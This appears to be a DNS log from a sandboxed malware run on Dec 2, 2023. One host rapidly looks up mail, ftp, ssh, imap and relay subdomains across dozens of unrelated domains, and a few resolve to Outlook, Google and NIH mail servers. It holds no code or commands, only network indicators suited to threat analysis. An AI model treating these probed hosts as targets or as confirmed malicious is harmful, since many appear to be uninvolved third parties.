                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.094161034 CET1.1.1.1192.168.2.60x85e1Name error (3)joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.094172001 CET1.1.1.1192.168.2.60x18f6Name error (3)brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.097676039 CET1.1.1.1192.168.2.60xf883Name error (3)winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.119384050 CET1.1.1.1192.168.2.60x3db9Name error (3)bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.119698048 CET1.1.1.1192.168.2.60x2115Name error (3)devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.122772932 CET1.1.1.1192.168.2.60x69dcName error (3)er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.124301910 CET1.1.1.1192.168.2.60x3a6fName error (3)rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.212791920 CET1.1.1.1192.168.2.60x4efbName error (3)mail.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.424031973 CET1.1.1.1192.168.2.60x7462Name error (3)mail.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.425450087 CET1.1.1.1192.168.2.60x8dc7Name error (3)mail.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.427323103 CET1.1.1.1192.168.2.60xf06dName error (3)mail.bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.428854942 CET1.1.1.1192.168.2.60xf48aName error (3)mail.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.428869963 CET1.1.1.1192.168.2.60x716Name error (3)mail.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.501127005 CET1.1.1.1192.168.2.60x4764Name error (3)ftp.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.501334906 CET1.1.1.1192.168.2.60x142cName error (3)ftp.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.518490076 CET1.1.1.1192.168.2.60x13fName error (3)ftp.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.519910097 CET1.1.1.1192.168.2.60x8321Name error (3)ftp.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.531327009 CET1.1.1.1192.168.2.60x46aaName error (3)ftp.brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.541285992 CET1.1.1.1192.168.2.60xd5d2Name error (3)mail.rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.542098045 CET1.1.1.1192.168.2.60x2307Name error (3)mail.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.544219971 CET1.1.1.1192.168.2.60xb466Name error (3)mail.devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.547036886 CET1.1.1.1192.168.2.60xf1feName error (3)ssh.mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.586289883 CET1.1.1.1192.168.2.60xc8d3Name error (3)ftp.er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.586311102 CET1.1.1.1192.168.2.60xa9e1Name error (3)ssh.er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.586327076 CET1.1.1.1192.168.2.60x4507Name error (3)mail.er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.592015028 CET1.1.1.1192.168.2.60xba42Name error (3)ssh.brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.598687887 CET1.1.1.1192.168.2.60xf228Name error (3)ssh.r2husers.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.609536886 CET1.1.1.1192.168.2.60xf29Name error (3)ftp.exmur.nia.nih.govnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.611362934 CET1.1.1.1192.168.2.60x5ec9Name error (3)ssh.exmur.nia.nih.govnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.615886927 CET1.1.1.1192.168.2.60xfc81Name error (3)mail.brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.629549026 CET1.1.1.1192.168.2.60x1f81Name error (3)ftp.aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.632489920 CET1.1.1.1192.168.2.60x399aName error (3)mail.elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.637975931 CET1.1.1.1192.168.2.60x8101Name error (3)assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.668732882 CET1.1.1.1192.168.2.60x5169Name error (3)ssh.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.670093060 CET1.1.1.1192.168.2.60xef25Name error (3)ssh.princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.670748949 CET1.1.1.1192.168.2.60x972aName error (3)princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.673260927 CET1.1.1.1192.168.2.60x79ceName error (3)yahoogabes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.737366915 CET1.1.1.1192.168.2.60x5c27Name error (3)ssh.devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.738328934 CET1.1.1.1192.168.2.60x67c5Name error (3)ftp.devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.776534081 CET1.1.1.1192.168.2.60xbb73Name error (3)ftp.cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.802454948 CET1.1.1.1192.168.2.60xd03dName error (3)ftp.yahoogabes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.820601940 CET1.1.1.1192.168.2.60x1250Name error (3)ssh.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.832534075 CET1.1.1.1192.168.2.60xe772Name error (3)mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.835002899 CET1.1.1.1192.168.2.60x6edaName error (3)ssh.assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.839374065 CET1.1.1.1192.168.2.60xf975Name error (3)my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.844886065 CET1.1.1.1192.168.2.60x59abName error (3)imap.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.882103920 CET1.1.1.1192.168.2.60x1a22Name error (3)mail.aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.921215057 CET1.1.1.1192.168.2.60x8c75Name error (3)ssh.yahoogabes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.945956945 CET1.1.1.1192.168.2.60x82eeName error (3)ftp.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.983237982 CET1.1.1.1192.168.2.60xc63cName error (3)mail.mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.990848064 CET1.1.1.1192.168.2.60x9e49Name error (3)ftp.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.994302034 CET1.1.1.1192.168.2.60x310aName error (3)cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.017438889 CET1.1.1.1192.168.2.60xc3faName error (3)llefigaro.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.033224106 CET1.1.1.1192.168.2.60xa9f4Name error (3)mail.llefigaro.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.034104109 CET1.1.1.1192.168.2.60x3455Name error (3)mail.princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.067111969 CET1.1.1.1192.168.2.60x3f9aName error (3)ftp.rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.236399889 CET1.1.1.1192.168.2.60x962fName error (3)ssh.llefigaro.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.306588888 CET1.1.1.1192.168.2.60x5e66Name error (3)goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.322190046 CET1.1.1.1192.168.2.60x9437Name error (3)ssh.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.638748884 CET1.1.1.1192.168.2.60x956cName error (3)mail.tomsknetrunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.711246967 CET1.1.1.1192.168.2.60x9fa8Name error (3)ssh.rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.030587912 CET1.1.1.1192.168.2.60x74c1Name error (3)ftp.mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.031626940 CET1.1.1.1192.168.2.60x1983Name error (3)mail.cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.034895897 CET1.1.1.1192.168.2.60x1ce2Name error (3)ftp.r2husers.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.280277014 CET1.1.1.1192.168.2.60x56a2Name error (3)elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.858699083 CET1.1.1.1192.168.2.60xa19cName error (3)mail.my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.946152925 CET1.1.1.1192.168.2.60x692eName error (3)mail.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.977014065 CET1.1.1.1192.168.2.60xf0afName error (3)mail.goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.005970001 CET1.1.1.1192.168.2.60x9b10Name error (3)mail.assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.101217985 CET1.1.1.1192.168.2.60xc4dName error (3)ftp.my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.140029907 CET1.1.1.1192.168.2.60x2489Name error (3)ftp.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.314424038 CET1.1.1.1192.168.2.60x1a1dName error (3)mail.erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.442126036 CET1.1.1.1192.168.2.60xd0f2Name error (3)erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.442801952 CET1.1.1.1192.168.2.60x9e12Name error (3)ssh.my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.497778893 CET1.1.1.1192.168.2.60x7251Name error (3)ftp.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.633809090 CET1.1.1.1192.168.2.60x7a74No error (0)aceservice-fr0i.mail.protection.outlook.com104.47.24.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.633809090 CET1.1.1.1192.168.2.60x7a74No error (0)aceservice-fr0i.mail.protection.outlook.com104.47.25.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.674401999 CET1.1.1.1192.168.2.60xc604Name error (3)ftp.bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.433521986 CET1.1.1.1192.168.2.60xf4c5Name error (3)ssh.aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.489131927 CET1.1.1.1192.168.2.60x5dbbName error (3)mail.mail.tomsknetrunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.512103081 CET1.1.1.1192.168.2.60x2451Name error (3)mail.noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.518778086 CET1.1.1.1192.168.2.60x208dName error (3)rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.522223949 CET1.1.1.1192.168.2.60xd8c0Name error (3)mail.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.522897005 CET1.1.1.1192.168.2.60x857Name error (3)bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.529731035 CET1.1.1.1192.168.2.60xeecdName error (3)bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.570173025 CET1.1.1.1192.168.2.60xbd4Name error (3)ftp.noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.597167969 CET1.1.1.1192.168.2.60xbfe6No error (0)www.attineos.com137.74.230.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.597866058 CET1.1.1.1192.168.2.60xa914Name error (3)ssh.erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.670572042 CET1.1.1.1192.168.2.60xd8f9Name error (3)ftp.assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.731126070 CET1.1.1.1192.168.2.60x77c1Name error (3)ssh.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.744076014 CET1.1.1.1192.168.2.60x390dName error (3)yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.748790979 CET1.1.1.1192.168.2.60xc4fdName error (3)condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.754674911 CET1.1.1.1192.168.2.60x620cName error (3)ssh.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.763813019 CET1.1.1.1192.168.2.60x2463Name error (3)ftp.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.892266989 CET1.1.1.1192.168.2.60x390dName error (3)yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.892287970 CET1.1.1.1192.168.2.60xc4fdName error (3)condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.893232107 CET1.1.1.1192.168.2.60x2463Name error (3)ftp.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.588737011 CET1.1.1.1192.168.2.60x6f6cNo error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.588737011 CET1.1.1.1192.168.2.60x6f6cNo error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.68.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.588737011 CET1.1.1.1192.168.2.60x6f6cNo error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.588737011 CET1.1.1.1192.168.2.60x6f6cNo error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.588737011 CET1.1.1.1192.168.2.60x6f6cNo error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.588737011 CET1.1.1.1192.168.2.60x6f6cNo error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.68.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.695283890 CET1.1.1.1192.168.2.60xab48Name error (3)ftp.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.040615082 CET1.1.1.1192.168.2.60x4ec3No error (0)aspmx5.googlemail.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.041209936 CET1.1.1.1192.168.2.60x5eb2No error (0)aspmx2.googlemail.com209.85.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.041217089 CET1.1.1.1192.168.2.60x2f52No error (0)alt2.aspmx.l.google.com64.233.184.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.041229963 CET1.1.1.1192.168.2.60x577dNo error (0)alt1.aspmx.l.google.com209.85.202.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.042048931 CET1.1.1.1192.168.2.60xe3ddNo error (0)alt3.aspmx.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.045703888 CET1.1.1.1192.168.2.60x2806No error (0)aspmx4.googlemail.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.051949024 CET1.1.1.1192.168.2.60x2788No error (0)mail.conceptualintegration.comconceptualintegration.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.051949024 CET1.1.1.1192.168.2.60x2788No error (0)conceptualintegration.com66.115.173.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.058166981 CET1.1.1.1192.168.2.60x8f98No error (0)nihcesxwayst04.hub.nih.gov165.112.13.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.058466911 CET1.1.1.1192.168.2.60x48faNo error (0)nihcesxway2.hub.nih.gov128.231.90.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.059492111 CET1.1.1.1192.168.2.60xabffNo error (0)nihcesxway4.hub.nih.gov128.231.90.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.059959888 CET1.1.1.1192.168.2.60xad2aNo error (0)nihcesxway3.hub.nih.gov128.231.90.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.071463108 CET1.1.1.1192.168.2.60xab3dNo error (0)aspmx3.googlemail.com64.233.184.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.077302933 CET1.1.1.1192.168.2.60xdab2Name error (3)ssh.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.077323914 CET1.1.1.1192.168.2.60xd347No error (0)mail.la-morada.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.100419998 CET1.1.1.1192.168.2.60xb8c2Name error (3)ssh.kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.101708889 CET1.1.1.1192.168.2.60x7f5fName error (3)egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.103647947 CET1.1.1.1192.168.2.60x7aa5Name error (3)ssh.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.8.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.9.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.11.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.107203960 CET1.1.1.1192.168.2.60xf98dNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.167777061 CET1.1.1.1192.168.2.60xa85bName error (3)topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.168766975 CET1.1.1.1192.168.2.60x801Name error (3)relay.mgnbizlaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.173660994 CET1.1.1.1192.168.2.60x2a22Name error (3)ssh.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.185034037 CET1.1.1.1192.168.2.60x632fName error (3)mailgate.3marc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.190535069 CET1.1.1.1192.168.2.60x20a2No error (0)mail.3marc.com69.160.38.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.193921089 CET1.1.1.1192.168.2.60x9f3dName error (3)imap.3marc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.209301949 CET1.1.1.1192.168.2.60xe333Name error (3)mailgate.moradfarag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.257224083 CET1.1.1.1192.168.2.60x1fd5No error (0)relay.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.257716894 CET1.1.1.1192.168.2.60xf5a3No error (0)pop3.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.259577036 CET1.1.1.1192.168.2.60x2dacNo error (0)mail.moraci.it84.33.37.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.264898062 CET1.1.1.1192.168.2.60xf07dNo error (0)mx2.postmaster.hu80.249.168.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.286328077 CET1.1.1.1192.168.2.60x4115Name error (3)imap.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.294133902 CET1.1.1.1192.168.2.60x9f27Name error (3)mailgate.eremina.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.320702076 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.320702076 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.320702076 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.320702076 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.320702076 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.320702076 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.332469940 CET1.1.1.1192.168.2.60x6ebfName error (3)mail.estbest.eenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.74A (IP address)IN (0x0001)false
